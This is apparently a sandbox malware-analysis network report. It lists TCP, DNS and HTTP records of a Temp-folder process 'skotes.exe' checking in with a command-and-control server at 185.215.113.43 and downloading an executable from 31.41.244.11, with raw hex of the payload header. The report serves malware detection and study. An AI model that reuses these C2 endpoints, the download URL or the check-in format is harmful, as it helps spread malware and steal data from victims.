                                                                                                                                          Dec 8, 2024 18:06:49.801824093 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.808142900 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.808160067 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.808231115 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.808238029 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.808276892 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.814280987 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.814297915 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.814341068 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.814347982 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.814384937 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.814403057 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.820497036 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.820507050 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.820611000 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.820622921 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.820707083 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.820707083 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.827091932 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.827116966 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.827147961 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.827155113 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.827192068 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.977471113 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.977487087 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.977555037 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.977576017 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.977619886 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.983690977 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.983706951 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.983788967 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.983798027 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.983833075 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.990099907 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.990114927 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.990166903 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.990174055 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.990214109 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.996093988 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.996109009 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.996161938 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:49.996169090 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:49.996207952 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.002229929 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.002245903 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.002301931 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.002310991 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.002351046 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.008373022 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.008394003 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.008433104 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.008439064 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.008465052 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.008481026 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.014575958 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.014590979 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.014643908 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.014650106 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.014688969 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.021044016 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.021059990 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.021111965 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.021121025 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.021158934 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.169466019 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.169483900 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.169565916 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.169574022 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.169615984 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.175986052 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.176001072 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.176079988 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.176086903 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.176126957 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.182203054 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.182216883 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.182269096 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.182276964 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.182315111 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.187868118 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.187884092 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.187938929 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.187944889 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.187983036 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.194322109 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.194338083 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.194394112 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.194401979 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.194442034 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.200357914 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.200375080 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.200431108 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.200438023 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.200484037 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.202097893 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.202157974 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.202162981 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.202173948 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.202214956 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.202567101 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.305143118 CET49884443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.305180073 CET44349884104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.305280924 CET49884443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.305511951 CET49884443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:50.305522919 CET44349884104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.885409117 CET8049879185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.885473967 CET4987980192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:51.432991982 CET49886443192.168.2.4104.21.81.153
                                                                                                                                          Dec 8, 2024 18:06:51.433012962 CET44349886104.21.81.153192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:51.433074951 CET49886443192.168.2.4104.21.81.153
                                                                                                                                          Dec 8, 2024 18:06:51.438627958 CET49886443192.168.2.4104.21.81.153
                                                                                                                                          Dec 8, 2024 18:06:51.438643932 CET44349886104.21.81.153192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:51.541877985 CET44349884104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:51.543512106 CET49884443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:51.543535948 CET44349884104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:51.905865908 CET49884443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:51.905886889 CET44349884104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:51.975580931 CET44349884104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:52.030638933 CET49884443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:52.470360041 CET4987980192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:52.470643044 CET4989180192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:52.525360107 CET44349884104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:52.525437117 CET44349884104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:52.526038885 CET49884443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:52.526038885 CET49884443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:52.591048002 CET8049891185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:52.591238022 CET4989180192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:52.591255903 CET8049879185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:52.591532946 CET4989180192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:52.591532946 CET4987980192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:52.656233072 CET44349886104.21.81.153192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:52.656290054 CET49886443192.168.2.4104.21.81.153
                                                                                                                                          Dec 8, 2024 18:06:52.658107996 CET49886443192.168.2.4104.21.81.153
                                                                                                                                          Dec 8, 2024 18:06:52.658116102 CET44349886104.21.81.153192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:52.658344030 CET44349886104.21.81.153192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:52.702517986 CET49886443192.168.2.4104.21.81.153
                                                                                                                                          Dec 8, 2024 18:06:52.709161043 CET49886443192.168.2.4104.21.81.153
                                                                                                                                          Dec 8, 2024 18:06:52.709180117 CET49886443192.168.2.4104.21.81.153
                                                                                                                                          Dec 8, 2024 18:06:52.709254026 CET44349886104.21.81.153192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:52.710954905 CET8049891185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:53.390692949 CET44349886104.21.81.153192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:53.390790939 CET44349886104.21.81.153192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:53.390954971 CET49886443192.168.2.4104.21.81.153
                                                                                                                                          Dec 8, 2024 18:06:53.391146898 CET49886443192.168.2.4104.21.81.153
                                                                                                                                          Dec 8, 2024 18:06:53.391155005 CET44349886104.21.81.153192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:53.391168118 CET49886443192.168.2.4104.21.81.153
                                                                                                                                          Dec 8, 2024 18:06:53.391171932 CET44349886104.21.81.153192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:53.444001913 CET49893443192.168.2.4104.21.81.153
                                                                                                                                          Dec 8, 2024 18:06:53.444025993 CET44349893104.21.81.153192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:53.444117069 CET49893443192.168.2.4104.21.81.153
                                                                                                                                          Dec 8, 2024 18:06:53.444345951 CET49893443192.168.2.4104.21.81.153
                                                                                                                                          Dec 8, 2024 18:06:53.444360971 CET44349893104.21.81.153192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:53.938564062 CET8049891185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:53.938985109 CET4989180192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:54.647885084 CET49893443192.168.2.4104.21.81.153
                                                                                                                                          Dec 8, 2024 18:06:55.609433889 CET4989180192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:55.609713078 CET4989980192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:55.729182005 CET8049899185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:55.729197025 CET8049891185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:55.729284048 CET4989180192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:55.729305029 CET4989980192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:55.729573965 CET4989980192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:55.852390051 CET8049899185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:57.079854012 CET8049899185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:57.079910040 CET4989980192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:58.594475985 CET4989980192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:58.594729900 CET4990580192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:58.714692116 CET8049899185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:58.714775085 CET4989980192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:58.714781046 CET8049905185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:58.714832067 CET4990580192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:58.715006113 CET4990580192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:58.835091114 CET8049905185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:07:00.065918922 CET8049905185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:07:00.065975904 CET4990580192.168.2.4185.215.113.43
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Dec 8, 2024 18:06:15.190263033 CET5145453192.168.2.41.1.1.1
                                                                                                                                          Dec 8, 2024 18:06:15.532566071 CET53514541.1.1.1192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:36.235838890 CET5453253192.168.2.41.1.1.1
                                                                                                                                          Dec 8, 2024 18:06:36.691045046 CET53545321.1.1.1192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:50.636415005 CET5909053192.168.2.41.1.1.1
                                                                                                                                          Dec 8, 2024 18:06:50.860856056 CET53590901.1.1.1192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:51.028330088 CET5879953192.168.2.41.1.1.1
                                                                                                                                          Dec 8, 2024 18:06:51.381230116 CET53587991.1.1.1192.168.2.4
                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Dec 8, 2024 18:06:15.190263033 CET192.168.2.41.1.1.10x33d3Standard query (0)atten-supporse.bizA (IP address)IN (0x0001)false
                                                                                                                                          Dec 8, 2024 18:06:36.235838890 CET192.168.2.41.1.1.10xfe5eStandard query (0)gamertool.euA (IP address)IN (0x0001)false
                                                                                                                                          Dec 8, 2024 18:06:50.636415005 CET192.168.2.41.1.1.10x9456Standard query (0)impend-differ.bizA (IP address)IN (0x0001)false
                                                                                                                                          Dec 8, 2024 18:06:51.028330088 CET192.168.2.41.1.1.10x74cStandard query (0)se-blurry.bizA (IP address)IN (0x0001)false
                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Dec 8, 2024 18:06:15.532566071 CET1.1.1.1192.168.2.40x33d3No error (0)atten-supporse.biz172.67.165.166A (IP address)IN (0x0001)false
                                                                                                                                          Dec 8, 2024 18:06:15.532566071 CET1.1.1.1192.168.2.40x33d3No error (0)atten-supporse.biz104.21.16.9A (IP address)IN (0x0001)false
                                                                                                                                          Dec 8, 2024 18:06:36.691045046 CET1.1.1.1192.168.2.40xfe5eNo error (0)gamertool.eu104.21.9.168A (IP address)IN (0x0001)false
                                                                                                                                          Dec 8, 2024 18:06:36.691045046 CET1.1.1.1192.168.2.40xfe5eNo error (0)gamertool.eu172.67.161.29A (IP address)IN (0x0001)false
                                                                                                                                          Dec 8, 2024 18:06:50.860856056 CET1.1.1.1192.168.2.40x9456Name error (3)impend-differ.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 8, 2024 18:06:51.381230116 CET1.1.1.1192.168.2.40x74cNo error (0)se-blurry.biz104.21.81.153A (IP address)IN (0x0001)false
                                                                                                                                          Dec 8, 2024 18:06:51.381230116 CET1.1.1.1192.168.2.40x74cNo error (0)se-blurry.biz172.67.162.65A (IP address)IN (0x0001)false
                                                                                                                                          • atten-supporse.biz
                                                                                                                                          • gamertool.eu
                                                                                                                                          • se-blurry.biz
                                                                                                                                          • 185.215.113.43
                                                                                                                                          • 31.41.244.11
                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.449753185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:04.177908897 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 4
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                          Data Ascii: st=s
                                                                                                                                          Dec 8, 2024 18:06:05.522176027 CET219INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:05 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 1 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.449759185.215.113.43807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:07.159018040 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 185.215.113.43
                                                                                                                                          Content-Length: 154
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                          Dec 8, 2024 18:06:08.502834082 CET305INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:08 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Data Raw: 37 33 0d 0a 20 3c 63 3e 31 30 31 33 32 32 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 33 32 66 63 34 31 35 31 62 65 62 30 30 62 36 31 64 30 62 31 63 34 31 62 62 64 30 63 64 33 63 62 30 65 33 64 31 34 38 32 62 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 73 <c>1013229001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb932fc4151beb00b61d0b1c41bbd0cd3cb0e3d1482b#<d>0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.44976531.41.244.11807672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 8, 2024 18:06:08.626698971 CET65OUTGET /files/806475321/0tClIDb.exe HTTP/1.1
                                                                                                                                          Host: 31.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:09.970753908 CET1236INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:09 GMT
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Content-Length: 1892352
                                                                                                                                          Last-Modified: Sun, 08 Dec 2024 16:55:07 GMT
                                                                                                                                          Connection: keep-alive
                                                                                                                                          ETag: "6755cf6b-1ce000"
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 af 50 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c6 03 00 00 ac 00 00 00 00 00 00 00 90 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4a 00 00 04 00 00 5d 07 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 30 05 00 70 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELbPgJ@J]@\0p 1 2@.rsrc B@.idata 0F@ *@H@tgrwqosfp0pJ@iapomrjrJ@.taggant0J"@
                                                                                                                                          Dec 8, 2024 18:06:09.970927000 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii:
                                                                                                                                          Dec 8, 2024 18:06:09.970937014 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii:
                                                                                                                                          Dec 8, 2024 18:06:09.970947981 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii:
                                                                                                                                          Dec 8, 2024 18:06:09.970957994 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii:
                                                                                                                                          Dec 8, 2024 18:06:09.971097946 CET672INData Raw: 55 da 1c c1 1a 1b 4f 69 e2 02 14 c9 ab 64 f3 e3 51 a8 fb de 09 87 fa a8 7a 9f 28 b1 1d 83 15 aa 86 99 51 64 31 90 4b dc 3e 18 ab e6 da c1 ba a2 6f 43 0d 21 59 b0 03 bc 71 55 68 ab bf 8a 1d 00 30 f3 96 bb 36 02 6d 34 19 e2 3b 18 7a a6 8a c2 cb 90
                                                                                                                                          Data Ascii: UOidQz(Qd1K>oC!YqUh06m4;zB}j)<gBcHJs9,)zVfm).0&{MjC_b)WnUJP9[@Y4H*T8vp1Z0J]: <:f"A+Z*rI@
                                                                                                                                          Dec 8, 2024 18:06:09.971164942 CET1236INData Raw: c2 1e 6c 4c 34 58 d1 5e f2 d6 30 27 78 72 28 ca 01 29 50 2c 4c 33 ac 18 8c 72 20 e9 e1 5e 65 a6 ce 3a 68 e1 2c 59 c4 74 2e b1 38 7f 5c 62 0c 27 e2 42 74 ca 0d b5 b3 76 e8 20 26 ad 7f 76 70 f4 43 4e 50 75 58 90 42 b8 17 ce 25 e1 4d 11 55 ed 2d 83
                                                                                                                                          Data Ascii: lL4X^0'xr()P,L3r ^e:h,Yt.8\b'Btv &vpCNPuXB%MU-[l([e/{I8 x9!`u_t7qr!8I8322Z8yN9>Q<8k*-:d[xB.M@ddY(]}@hQ~C]|"(
